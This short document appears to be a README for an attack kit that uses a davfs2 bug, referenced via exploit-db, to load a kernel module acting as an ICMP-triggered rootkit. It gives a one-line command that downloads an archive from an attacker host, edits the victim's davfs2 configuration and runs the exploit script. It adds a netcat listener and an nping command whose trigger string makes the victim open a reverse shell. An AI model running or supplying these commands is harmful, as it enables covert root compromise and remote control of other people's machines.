===================================
See the url https://www.exploit-db.com/exploits/28806 to understand the davfs2 bug when the exploit is executed the mount.davfs will load our module coda which reresent a ICMP rootkit , executing a reverse shell.
This script sends a reverse shell in response to an attacker ping.
We have to download the archive and execute it like :
$ wget -O davfs.tar.gz http://Adresse_attacker/davfs_rootkit.tar.gz && tar -xzf davfs.tar.gz && cd davfs_exploit_rootkit_revShell/ && sed -i 's/# kernel_fs fuse/kernel_fs coda/g' /home/foo/.davfs2/davfs2.conf && chmod +x ./exploit.sh && ./exploit.sh
$ mount /home/foo/dav
You have to listen in a port like : nc -lvp 8888
nping --icmp -c 1 -dest-ip [victim ip] --data-string 'maK_it_$H3LL [attacker ip] [PORT]'
We can ping the victim machine and send ourselves back a reverse shell.